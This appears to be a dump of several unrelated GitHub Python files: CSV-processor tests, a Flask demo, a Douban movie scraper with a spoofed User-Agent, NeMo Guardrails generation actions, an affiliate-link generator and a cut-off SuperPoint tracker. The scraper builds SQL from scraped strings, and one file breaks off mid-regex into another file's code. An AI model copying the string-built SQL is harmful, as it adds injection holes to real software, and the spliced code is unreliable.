['Toyota','Corolla','Black','100,000','28.2','$10,000'],\n ['Ferrari','Dino 246 GT','Red','252,346','18.2','N.A.'],\n ]\n if not os.path.isfile(file_name):\n test_file = open(file_name, \"w\", newline=\"\\n\")\n writer = csv.writer(test_file)\n writer.writerows(data)\n test_file.close()\n\n@pytest.fixture()\ndef update_cost_csv():\n data = (\n 'Manufacturer,Model,Color,Miles,MPG,Cost\\n'\n 'Toyota,Camry,Gray,\"75,000\",25.4,\"$15,000\"\\n'\n 'Volkswagon,GTI,White,\"75,000\",23.2,\"$20,000\"\\n'\n 'Toyota,Corolla,Black,\"100,000\",28.2,\"$10,000\"\\n'\n 'Ferrari,Dino 246 GT,Red,\"252,346\",18.2,-1\\n'\n )\n return mock.mock_open(read_data=data)\n\n@pytest.fixture()\ndef update_miles_csv():\n data = (\n 'Manufacturer,Model,Color,Miles,MPG,Cost\\n'\n 'Toyota,Camry,Gray,\"76,000\",25.4,\"$15,000\"\\n'\n 'Volkswagon,GTI,White,\"75,000\",23.2,\"$20,000\"\\n'\n 'Toyota,Corolla,Black,\"100,000\",28.2,\"$10,000\"\\n'\n 'Ferrari,Dino 246 GT,Red,\"252,346\",18.2,N.A.\\n'\n )\n return mock.mock_open(read_data=data)\n\n'''\nBuild a test string for the metadata\n'''\ndef build_metadata_string(number, name, datatype, qual_values:dict, quant_values:list):\n string = f\"\\n datatype:{datatype}\"\n if qual_values:\n string = string + f\"; qual_values_count:{len(qual_values.keys())}\"\n if quant_values:\n string = string + f\"; quant_values_count:{len(quant_values)}\"\n if qual_values:\n string = string + f\"\\nQualitative Values ['Value': count]: {qual_values}\"\n return string\n\n'''\nTest validity of metadata object\n'''\ndef run_metadata_asserts(metadata, number, name, correct_qual_values:dict, quant_count, datatype):\n assert(metadata.name == name)\n assert(metadata.number == number)\n assert(metadata.qualitative_values == correct_qual_values)\n assert(metadata.datatype == datatype)\n assert(metadata.quantitative_values_count == quant_count)\n return True\n\n'''\nTest init to:\n\n-Make sure that column titles are added as attributes\n-Make sure data populates correctly\n'''\ndef test_init(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n assert(run_metadata_asserts(test_file.Manufacturer, 0, \"Manufacturer\", MANUFACTURER_VALUES, 0, \"qualitative\"))\n assert(run_metadata_asserts(test_file.Model, 1, \"Model\", MODEL_VALUES, 0, \"qualitative\"))\n assert(run_metadata_asserts(test_file.Color, 2, \"Color\", COLOR_VALUES, 0, \"qualitative\"))\n assert(run_metadata_asserts(test_file.Miles, 3, \"Miles\", EMPTY_VALUES, 4, \"quantitative\"))\n assert(run_metadata_asserts(test_file.MPG, 4, \"MPG\", EMPTY_VALUES, 4, \"quantitative\"))\n assert(run_metadata_asserts(test_file.Cost, 5, \"Cost\", {\"N.A.\": 1}, 3, \"both\"))\n\ndef test_create_file(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n alt_file = DataFile.create(\"../test_data/Data.csv\")\n\n assert(test_file == alt_file)\n\ndef test_show_metadata_qual_data(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n MANUFACTURER_META_REPORT = build_metadata_string(0, \"Manufacturer\", \"qualitative\", MANUFACTURER_VALUES, EMPTY_VALUES)\n manufacturer_report = test_file.show_metadata(\"Manufacturer\")\n assert(MANUFACTURER_META_REPORT == manufacturer_report)\n\ndef test_show_metadata_quant_data(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n MPG_META_REPORT = build_metadata_string(4, \"MPG\", \"quantitative\", EMPTY_VALUES, MPG_VALUES)\n MPG_report = test_file.show_metadata(\"MPG\")\n assert(MPG_META_REPORT == MPG_report)\n\ndef test_show_metadata_both_data(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n COST_META_REPORT = build_metadata_string(5, \"Cost\", \"both\", COST_QUAL_VALUES, COST_QUANT_VALUES)\n cost_report = test_file.show_metadata(\"Cost\")\n assert(COST_META_REPORT == cost_report)\n\ndef test_update_column_value_no_kwargs(update_cost_csv):\n test_file = \"../test_data/simple.csv\"\n create_simple_csv(test_file)\n destination_file = \"update_column_test.csv\"\n data_file = DataFile(test_file)\n data_file.update_value(\"N.A.\", -1,\"Cost\", new_file_name=destination_file)\n test_file = open(\"../test_data/\" + destination_file, \"r\")\n with patch(\"builtins.open\", update_cost_csv):\n with open(\"../test_data/simple.csv\", \"r\") as correct_file:\n test_lines = test_file.readlines()\n for test_line in test_lines:\n correct_line = correct_file.readline()\n #print(test_line)\n #print(correct_line)\n assert(test_line == correct_line)\n test_file.close()\n os.remove(\"../test_data/\" + destination_file)\n os.remove(\"../test_data/simple.csv\")\n\ndef test_update_column_value_kwargs(update_miles_csv):\n test_file = \"../test_data/simple.csv\"\n create_simple_csv(test_file)\n destination_file = \"update_column_test.csv\"\n data_file = DataFile(test_file)\n data_file.update_value(75000, 76000,\"Miles\", new_file_name=destination_file, Model=\"Camry\")\n test_file = open(\"../test_data/\" + destination_file, \"r\")\n with patch(\"builtins.open\", update_miles_csv):\n with open(\"../test_data/simple.csv\", \"r\") as correct_file:\n test_lines = test_file.readlines()\n for test_line in test_lines:\n correct_line = correct_file.readline()\n #print(test_line)\n #print(correct_line)\n assert(test_line.replace(\",\", \"\").replace(\"$\", \"\").replace('\"', \"\") == correct_line.replace(\",\", \"\").replace(\"$\", \"\").replace('\"', \"\"))\n test_file.close()\n os.remove(\"../test_data/\" + destination_file)\n os.remove(\"../test_data/simple.csv\")\n\n\n\n", "repo_name": "DevinDuval09/csv_processor", "sub_path": "csv_processor/tests/DataFileTests.py", "file_name": "DataFileTests.py", "file_ext": "py", "file_size_in_byte": 7177, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "mock.mock_open", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 39, "usage_type": "call"}, {"api_name": "mock.mock_open", "line_number": 52, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 43, "usage_type": "call"}, {"api_name": "mock.mock_open", "line_number": 63, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 54, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 97, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 108, "usage_type": "call"}, {"api_name": "DataFile.DataFile.create", "line_number": 109, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 109, "usage_type": "name"}, {"api_name": "DataFile.DataFile", "line_number": 115, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 123, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 131, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 141, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 144, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 153, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 154, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 160, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 163, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 172, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "5508335903", "text": "# https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-ii-templates\n\nfrom flask import render_template\nfrom flask import Flask\napp = Flask(__name__)\n\n\n@app.route('/')\n@app.route('/')\ndef index(name):\n user = {'username': name}\n return render_template('index.html', title='Great!', user=user)\n", "repo_name": "umbcdata601/spring2020", "sub_path": "jupyter_notebooks/week_05_automation/flask_demo/html_from_template/my_flask.py", "file_name": "my_flask.py", "file_ext": "py", "file_size_in_byte": 317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "71373161448", "text": "# https://movie.douban.com/top250\n# 爬取豆瓣电影Top250的基本信息, 包括电源的名称, 豆瓣评分, 评价数, 电影概况, 电影链接等.\n\n# coding=utf-8\nfrom bs4 import BeautifulSoup # 网页解析, 获取数据\nimport re # 正则表达式, 进行文字匹配\nimport urllib.request, urllib.error # 指定URL, 获取网页数据\nimport xlwt # 进行excel操作\nimport sqlite3 # 进行SQLite数据库操作\n\ndef main():\n baseurl = 'https://movie.douban.com/top250?start='\n # 1.爬取网页\n data_list = getData(baseurl)\n print(data_list)\n print(len(data_list))\n # print(len(data_list))\n save_path = './moviesTop250.xls'\n # 3.保存数据\n # saveData(save_path, data_list)\n saveDataToSQlite(data_list, 'movieTop250')\n\n\ndef askURL(url):\n # 伪装成浏览器\n head = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.30\",\n \"Referer\": url\n }\n request = urllib.request.Request(url=url, headers=head)\n html = \"\"\n try:\n response = urllib.request.urlopen(request)\n html = response.read().decode('utf-8')\n # print(html)\n except urllib.error.URLError as e:\n print(e)\n return html\n\n# 正则表达式\nsuper_link = re.compile(r'') # 爬取超链接\nimg_link = re.compile(r'', re.S) # 爬取图片链接 re.S让换行符包含在连接中\ntitle = re.compile(r'(.*?)') # 电影名\nrate = re.compile(r'(.*?)') # 电影评分\njudge = re.compile(r'(.*?)人评价') # 评价人数\ninq = re.compile(r'(.*?)') # 电影概况\nBd = re.compile(r'

(.*?)

', re.S) # 相关内容\n\n\n\ndef getData(baseurl):\n data_list = []\n for i in range(10):\n url = baseurl + str(i * 25)\n html = askURL(url)\n # 逐一解析网页\n soup = BeautifulSoup(html, 'html.parser')\n for item in soup.find_all('div', class_='item'):\n data = [] # 保存一部电影的所有信息\n item = str(item)\n # print(item)\n link = re.findall(super_link, item)[0] # 通过正侧表达式查找指定的字符串\n # print(link)\n data.append(link)\n data.append(re.findall(img_link, item)[0])\n data.append(re.findall(title, item)[0])\n data.append(re.findall(rate, item)[0])\n data.append(re.findall(judge, item)[0])\n data.append(\"\" if re.findall(inq, item) == [] else re.findall(inq, item)[0]) # 有可能为空\n data.append(re.findall(Bd, item)[0].replace(\" \", \"\"))\n\n data_list.append(data)\n\n return data_list\n\ndef saveData(save_path, data_list):\n workbook = xlwt.Workbook(encoding='utf-8') # 创建workbook对象\n worksheet = workbook.add_sheet('sheet1') # 创建工作表\n col = [\"电影详情链接\", \"图���链接\", \"中文名\", \"评分\", \"评价人数\", \"概况\", \"其他信息\"]\n for i in range(7):\n worksheet.write(0, i, col[i])\n for i in range(len(data_list)):\n for j in range(len(data_list[0])):\n worksheet.write(i+1, j, data_list[i][j])\n workbook.save(save_path)\n\ndef init_SQLite(dbpath):\n import sqlite3\n\n conn = sqlite3.connect(dbpath) # 打开或创建数据库文件\n print(\"Opened database successfully.\")\n\n cursor = conn.cursor() # 获取游标\n sql = ''' \n create table moviesTop250(\n id integer primary key autoincrement,\n super_link text not null,\n img_link text not null,\n name varchar not null,\n score numeric,\n num numeric,\n instroduction text,\n info text\n ) \n '''\n\n cursor.execute(sql)\n conn.commit() # 提交数据库操作\n\ndef saveDataToSQlite(data_list, dbpath):\n init_SQLite(dbpath)\n conn = sqlite3.connect(dbpath)\n cursor = conn.cursor()\n\n id = 1\n for data in data_list:\n # 拼写数据\n for index in range(len(data)):\n data[index] = '\"' + data[index] + '\"'\n sql = '''\n insert into moviesTop250 (\n id, super_link, img_link, name, score, num, instroduction, info)\n values (%s)\n '''%(f'\"{id}\",' + \",\".join(data))\n # print(sql)\n cursor.execute(sql)\n conn.commit()\n id += 1\n\n conn.close()\n\n\nif __name__ == '__main__':\n # askURL('https://baidu.com')\n main()", "repo_name": "yruns/Web_Crawler", "sub_path": "Moives/Movies.py", "file_name": "Movies.py", "file_ext": "py", "file_size_in_byte": 4653, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.request.request.Request", "line_number": 30, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 30, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 30, "usage_type": "name"}, {"api_name": "urllib.request.request.urlopen", "line_number": 33, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 33, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 33, "usage_type": "name"}, {"api_name": "urllib.request.error", "line_number": 36, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 36, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 41, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 42, "usage_type": "call"}, {"api_name": "re.S", "line_number": 42, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 44, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 45, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 46, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 47, "usage_type": "call"}, {"api_name": "re.S", "line_number": 47, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 57, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 62, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 65, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 66, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 67, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 68, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 69, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 70, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 77, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 90, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "70313852647", "text": "import asyncio\nimport logging\nimport random\nimport re\nimport sys\nimport threading\nimport uuid\nfrom ast import literal_eval\nfrom functools import lru_cache\nfrom time import time\nfrom typing import Callable, List, Optional\n\nfrom jinja2 import Environment, meta\nfrom langchain.llms import BaseLLM\n\nfrom nemoguardrails.actions.actions import ActionResult, action\nfrom nemoguardrails.actions.llm.utils import (\n flow_to_colang,\n get_first_nonempty_line,\n get_last_bot_intent_event,\n get_last_user_intent_event,\n get_last_user_utterance_event,\n get_multiline_response,\n get_retrieved_relevant_chunks,\n llm_call,\n strip_quotes,\n)\nfrom nemoguardrails.embeddings.index import EmbeddingsIndex, IndexItem\nfrom nemoguardrails.language.parser import parse_colang_file\nfrom nemoguardrails.llm.params import llm_params\nfrom nemoguardrails.llm.taskmanager import LLMTaskManager\nfrom nemoguardrails.llm.types import Task\nfrom nemoguardrails.patch_asyncio import check_sync_call_from_async_loop\nfrom nemoguardrails.rails.llm.config import EmbeddingSearchProvider, RailsConfig\nfrom nemoguardrails.utils import new_event_dict\n\nlog = logging.getLogger(__name__)\n\n\nclass LLMGenerationActions:\n \"\"\"A container objects for multiple related actions.\"\"\"\n\n def __init__(\n self,\n config: RailsConfig,\n llm: BaseLLM,\n llm_task_manager: LLMTaskManager,\n get_embedding_search_provider_instance: Callable[\n [Optional[EmbeddingSearchProvider]], EmbeddingsIndex\n ],\n verbose: bool = False,\n ):\n self.config = config\n self.llm = llm\n self.verbose = verbose\n\n # If we have user messages, we build an index with them\n self.user_message_index = None\n self.bot_message_index = None\n self.flows_index = None\n\n self.get_embedding_search_provider_instance = (\n get_embedding_search_provider_instance\n )\n\n if check_sync_call_from_async_loop():\n t = threading.Thread(target=asyncio.run, args=(self.init(),))\n t.start()\n t.join()\n else:\n asyncio.run(self.init())\n\n self.llm_task_manager = llm_task_manager\n\n # We also initialize the environment for rendering bot messages\n self.env = Environment()\n\n async def init(self):\n await asyncio.gather(\n self._init_user_message_index(),\n self._init_bot_message_index(),\n self._init_flows_index(),\n )\n\n async def _init_user_message_index(self):\n \"\"\"Initializes the index of user messages.\"\"\"\n\n if not self.config.user_messages:\n return\n\n items = []\n for intent, utterances in self.config.user_messages.items():\n for text in utterances:\n items.append(IndexItem(text=text, meta={\"intent\": intent}))\n\n # If we have no patterns, we stop.\n if len(items) == 0:\n return\n\n self.user_message_index = self.get_embedding_search_provider_instance(\n self.config.core.embedding_search_provider\n )\n await self.user_message_index.add_items(items)\n\n # NOTE: this should be very fast, otherwise needs to be moved to separate thread.\n await self.user_message_index.build()\n\n async def _init_bot_message_index(self):\n \"\"\"Initializes the index of bot messages.\"\"\"\n\n if not self.config.bot_messages:\n return\n\n items = []\n for intent, utterances in self.config.bot_messages.items():\n for text in utterances:\n items.append(IndexItem(text=intent, meta={\"text\": text}))\n\n # If we have no patterns, we stop.\n if len(items) == 0:\n return\n\n self.bot_message_index = self.get_embedding_search_provider_instance(\n self.config.core.embedding_search_provider\n )\n await self.bot_message_index.add_items(items)\n\n # NOTE: this should be very fast, otherwise needs to be moved to separate thread.\n await self.bot_message_index.build()\n\n async def _init_flows_index(self):\n \"\"\"Initializes the index of flows.\"\"\"\n\n if not self.config.flows:\n return\n\n items = []\n for flow in self.config.flows:\n # We don't include the default system flows in the index because we don't want\n # the LLM to predict system actions.\n if flow.get(\"id\") in [\n \"generate user intent\",\n \"generate next step\",\n \"generate bot message\",\n ]:\n continue\n\n # TODO: check if the flow has system actions and ignore the flow.\n\n colang_flow = flow.get(\"source_code\") or flow_to_colang(flow)\n\n # We index on the full body for now\n items.append(IndexItem(text=colang_flow, meta={\"flow\": colang_flow}))\n\n # If we have no patterns, we stop.\n if len(items) == 0:\n return\n\n self.flows_index = self.get_embedding_search_provider_instance(\n self.config.core.embedding_search_provider\n )\n await self.flows_index.add_items(items)\n\n # NOTE: this should be very fast, otherwise needs to be moved to separate thread.\n await self.flows_index.build()\n\n def _get_general_instruction(self):\n \"\"\"Helper to extract the general instruction.\"\"\"\n text = \"\"\n for instruction in self.config.instructions:\n if instruction.type == \"general\":\n text = instruction.content\n\n # We stop at the first one for now\n break\n\n return text\n\n @lru_cache\n def _get_sample_conversation_two_turns(self):\n \"\"\"Helper to extract only the two turns from the sample conversation.\n\n This is needed to be included to \"seed\" the conversation so that the model\n can follow the format more easily.\n \"\"\"\n lines = self.config.sample_conversation.split(\"\\n\")\n i = 0\n user_count = 0\n while i < len(lines):\n if lines[i].startswith(\"user \"):\n user_count += 1\n\n if user_count == 3:\n break\n\n i += 1\n\n sample_conversation = \"\\n\".join(lines[0:i])\n\n # Remove any trailing new lines\n sample_conversation = sample_conversation.strip()\n\n return sample_conversation\n\n @action(is_system_action=True)\n async def generate_user_intent(\n self, events: List[dict], llm: Optional[BaseLLM] = None\n ):\n \"\"\"Generate the canonical form for what the user said i.e. user intent.\"\"\"\n\n # The last event should be the \"StartInternalSystemAction\" and the one before it the \"UtteranceUserActionFinished\".\n event = get_last_user_utterance_event(events)\n assert event[\"type\"] == \"UtteranceUserActionFinished\"\n\n # Use action specific llm if registered else fallback to main llm\n llm = llm or self.llm\n\n # TODO: check for an explicit way of enabling the canonical form detection\n\n if self.config.user_messages:\n # TODO: based on the config we can use a specific canonical forms model\n # or use the LLM to detect the canonical form. The below implementation\n # is for the latter.\n\n log.info(\"Phase 1: Generating user intent\")\n\n # We search for the most relevant similar user utterance\n examples = \"\"\n potential_user_intents = []\n\n if self.user_message_index:\n results = await self.user_message_index.search(\n text=event[\"final_transcript\"], max_results=5\n )\n\n # We add these in reverse order so the most relevant is towards the end.\n for result in reversed(results):\n examples += f\"user \\\"{result.text}\\\"\\n {result.meta['intent']}\\n\\n\"\n potential_user_intents.append(result.meta[\"intent\"])\n\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERATE_USER_INTENT,\n events=events,\n context={\n \"examples\": examples,\n \"potential_user_intents\": \", \".join(potential_user_intents),\n },\n )\n\n # We make this call with temperature 0 to have it as deterministic as possible.\n with llm_params(llm, temperature=self.config.lowest_temperature):\n result = await llm_call(llm, prompt)\n\n # Parse the output using the associated parser\n result = self.llm_task_manager.parse_task_output(\n Task.GENERATE_USER_INTENT, output=result\n )\n\n user_intent = get_first_nonempty_line(result)\n if user_intent is None:\n user_intent = \"unknown message\"\n\n if user_intent and user_intent.startswith(\"user \"):\n user_intent = user_intent[5:]\n\n log.info(\n \"Canonical form for user intent: \"\n + (user_intent if user_intent else \"None\")\n )\n\n if user_intent is None:\n return ActionResult(\n events=[new_event_dict(\"UserIntent\", intent=\"unknown message\")]\n )\n else:\n return ActionResult(\n events=[new_event_dict(\"UserIntent\", intent=user_intent)]\n )\n else:\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERAL, events=events\n )\n\n # We make this call with temperature 0 to have it as deterministic as possible.\n result = await llm_call(llm, prompt)\n\n return ActionResult(\n events=[\n new_event_dict(\"StartUtteranceBotAction\", script=result.strip())\n ]\n )\n\n @action(is_system_action=True)\n async def generate_next_step(\n self, events: List[dict], llm: Optional[BaseLLM] = None\n ):\n \"\"\"Generate the next step in the current conversation flow.\n\n Currently, only generates a next step after a user intent.\n \"\"\"\n log.info(\"Phase 2 :: Generating next step ...\")\n\n # Use action specific llm if registered else fallback to main llm\n llm = llm or self.llm\n\n # The last event should be the \"StartInternalSystemAction\" and the one before it the \"UserIntent\".\n event = get_last_user_intent_event(events)\n\n # Currently, we only predict next step after a user intent using LLM\n if event[\"type\"] == \"UserIntent\":\n user_intent = event[\"intent\"]\n\n # We search for the most relevant similar flows\n examples = \"\"\n if self.flows_index:\n results = await self.flows_index.search(text=user_intent, max_results=5)\n\n # We add these in reverse order so the most relevant is towards the end.\n for result in reversed(results):\n examples += f\"{result.text}\\n\\n\"\n\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERATE_NEXT_STEPS,\n events=events,\n context={\"examples\": examples},\n )\n\n # We use temperature 0 for next step prediction as well\n with llm_params(llm, temperature=self.config.lowest_temperature):\n result = await llm_call(llm, prompt)\n\n # Parse the output using the associated parser\n result = self.llm_task_manager.parse_task_output(\n Task.GENERATE_NEXT_STEPS, output=result\n )\n\n # If we don't have multi-step generation enabled, we only look at the first line.\n if not self.config.enable_multi_step_generation:\n result = get_first_nonempty_line(result)\n\n if result and result.startswith(\"bot \"):\n next_step = {\"bot\": result[4:]}\n else:\n next_step = {\"bot\": \"general response\"}\n\n # If we have to execute an action, we return the event to start it\n if next_step.get(\"execute\"):\n return ActionResult(\n events=[\n new_event_dict(\n \"StartInternalSystemAction\",\n action_name=next_step[\"execute\"],\n )\n ]\n )\n else:\n bot_intent = next_step.get(\"bot\")\n\n return ActionResult(\n events=[new_event_dict(\"BotIntent\", intent=bot_intent)]\n )\n else:\n # Otherwise, we parse the output as a single flow.\n # If we have a parsing error, we try to reduce size of the flow, potentially\n # up to a single step.\n lines = result.split(\"\\n\")\n while True:\n try:\n parse_colang_file(\"dynamic.co\", content=\"\\n\".join(lines))\n break\n except Exception as e:\n # If we could not parse the flow on the last line, we return a general response\n if len(lines) == 1:\n log.info(\"Exception while parsing single line: %s\", e)\n return ActionResult(\n events=[\n new_event_dict(\n \"BotIntent\", intent=\"general response\"\n )\n ]\n )\n\n log.info(\"Could not parse %s lines, reducing size\", len(lines))\n lines = lines[:-1]\n\n return ActionResult(\n events=[\n # We generate a random UUID as the flow_id\n new_event_dict(\n \"start_flow\",\n flow_id=str(uuid.uuid4()),\n flow_body=\"\\n\".join(lines),\n )\n ]\n )\n\n return ActionResult(return_value=None)\n\n def _render_string(\n self,\n template_str: str,\n context: Optional[dict] = None,\n ) -> str:\n \"\"\"Render a string using the provided context information.\n\n Args:\n template_str: The string template to render.\n context: The context for rendering.\n\n Returns:\n The rendered string.\n \"\"\"\n # First, if we have any direct usage of variables in the string,\n # we replace with correct Jinja syntax.\n for param in re.findall(r\"\\$([^ \\\"'!?\\-,; 0:\n if len(sh.row_values(rownum)[0]) > 0:\n data[domain] = sh.row_values(rownum)[0]\n\n\n return data\n\n def getLinkLinkPrice(self, key=None , url=None):\n if key is None or url is None:\n return False\n\n #url = urllib3.parse.quote_plus(url)\n\n return 'http://click.linkprice.com/click.php?m=%s&a=%s&l=9999&l_cd1=3&l_cd2=0&tu=%s' % (key, self.LINKPRICE_ID, url)\n\nif __name__ == \"__main__\":\n ppomppuLinkGenerator = PpomppuLinkGenerator()\n #print(ppomppuLinkGenerator.genLink(url='http://item.gmarket.co.kr/detailview/item.asp?goodscode=1401721949'))", "repo_name": "ko9ma7/crawler-1", "sub_path": "ppomppu_link_generator.py", "file_name": "ppomppu_link_generator.py", "file_ext": "py", "file_size_in_byte": 2003, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "shortener.Shortener", "line_number": 16, "usage_type": "call"}, {"api_name": "shortener.genShortenerBitly", "line_number": 17, "usage_type": "call"}, {"api_name": "tldextract.extract", "line_number": 20, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 32, "usage_type": "call"}, {"api_name": "tldextract.extract", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "4960423192", "text": "import cv2\nimport copy\nimport numpy as np \nfrom time import time\n\nfrom utils.feature_process import PointTracker\nfrom utils.feature_process import SuperPointFrontend_torch, SuperPointFrontend\nrun_time = 0.0\nmatch_time = 0.0\n\nmyjet = np.array([[0. , 0. , 0.5 ],\n [0. , 0. , 0.99910873],\n [0. , 0.37843137, 1. ],\n [0. , 0.83333333, 1. ],\n [0.30044276, 1. , 0.66729918],\n [0.66729918, 1. , 0.30044276],\n [1. , 0.90123457, 0. ],\n [1. , 0.48002905, 0. ],\n [0.99910873, 0.07334786, 0. ],\n [0.5 , 0. , 0. ]])\n\n\nclass VisualTracker:\n\tdef __init__(self, opts, cams):\n\n\t\tself.forwframe_ = {\n\t\t\t\t'PointID': [],\n\t\t\t\t'keyPoint': np.zeros((3,0)),\n\t\t\t\t'descriptor': np.zeros((256,0)),\n\t\t\t\t'image': None,\n\t\t\t\t}\n\n\t\tself.curframe_ = {\n\t\t\t\t'PointID': [],\n\t\t\t\t'keyPoint': np.zeros((3,0)),\n\t\t\t\t'descriptor': np.zeros((256,0)),\n\t\t\t\t'image': None\n\t\t\t\t}\n\t\n\t\tself.camera = cams\n\t\tself.new_frame = None\n\t\tself.allfeature_cnt = 0\n\t\t\n\t\tself.cuda = opts.cuda\n\t\tself.scale = opts.scale\n\t\tself.max_cnt = opts.max_cnt\n\t\tself.nms_dist = opts.nms_dist\n\t\tself.nn_thresh = opts.nn_thresh\n\t\tself.no_display = opts.no_display\n\t\tself.width = opts.W // opts.scale\n\t\tself.height = opts.H // opts.scale\n\t\tself.conf_thresh = opts.conf_thresh\n\t\tself.weights_path = opts.weights_path\n\n\t\t# SuperPointFrontend_torch SuperPointFrontend\n\t\tself.SuperPoint_Ghostnet = SuperPointFrontend_torch(\n\t\t\tweights_path = self.weights_path, \n\t\t\tnms_dist = self.nms_dist,\n\t\t\tconf_thresh = self.conf_thresh,\n\t\t\tcuda = self.cuda\n\t\t\t)\n\t\t\n\t\tself.tracker = PointTracker(nn_thresh=self.nn_thresh)\n\n\tdef undistortedLineEndPoints(self, scale):\n\n\t\tcur_un_pts = copy.deepcopy(self.curframe_['keyPoint'])\n\t\tids = copy.deepcopy(self.curframe_['PointID'])\n\t\tcur_pts = copy.deepcopy(cur_un_pts * scale)\n\n\t\tfor i in range(cur_pts.shape[1]):\n\t\t\tb = self.camera.liftProjective(cur_pts[:2,i])\n\t\t\tcur_un_pts[0,i] = b[0] / b[2]\n\t\t\tcur_un_pts[1,i] = b[1] / b[2]\n\n\t\treturn cur_un_pts, cur_pts, ids\n\n\n\tdef readImage(self, new_img):\n\n\t\tassert(new_img.ndim==2 and new_img.shape[0]==self.height and new_img.shape[1]==self.width), \"Frame: provided image has not the same size as the camera model or image is not grayscale\"\n\t\t\n\t\tself.new_frame = new_img\n\n\t\tfirst_image_flag = False\n\n\t\tif not self.forwframe_['PointID']:\n\t\t\tself.forwframe_['PointID'] = []\n\t\t\tself.forwframe_['keyPoint'] = np.zeros((3,0))\n\t\t\tself.forwframe_['descriptor'] = np.zeros((256,0))\n\n\t\t\tself.forwframe_['image'] = self.new_frame\n\t\t\tself.curframe_['image'] = self.new_frame\n\t\t\tfirst_image_flag = True\n\n\t\telse:\n\t\t\tself.forwframe_['PointID'] = []\n\t\t\tself.forwframe_['keyPoint'] = np.zeros((3,0))\n\t\t\tself.forwframe_['descriptor'] = np.zeros((256,0))\n\n\t\t\tself.forwframe_['image'] = self.new_frame\n\t\t\n\t\t######################### 提取关键点和描述子 ############################\n\t\tprint('*'*10 + \" current frame \" + '*'*10)\n\t\tstart_time = time()\n\t\tself.forwframe_['keyPoint'], self.forwframe_['descriptor'], heatmap = self.SuperPoint_Ghostnet.run(self.new_frame, conf_thresh=0.015)\n\n\t\tglobal run_time\n\t\trun_time += ( time()-start_time )\n\t\tprint(\"run time is :\", run_time)\n\n\t\tkeyPoint_size = self.forwframe_['keyPoint'].shape[1]\n\t\tprint(\"current keypoint size is :\", keyPoint_size)\n\n\t\tif keyPoint_size < 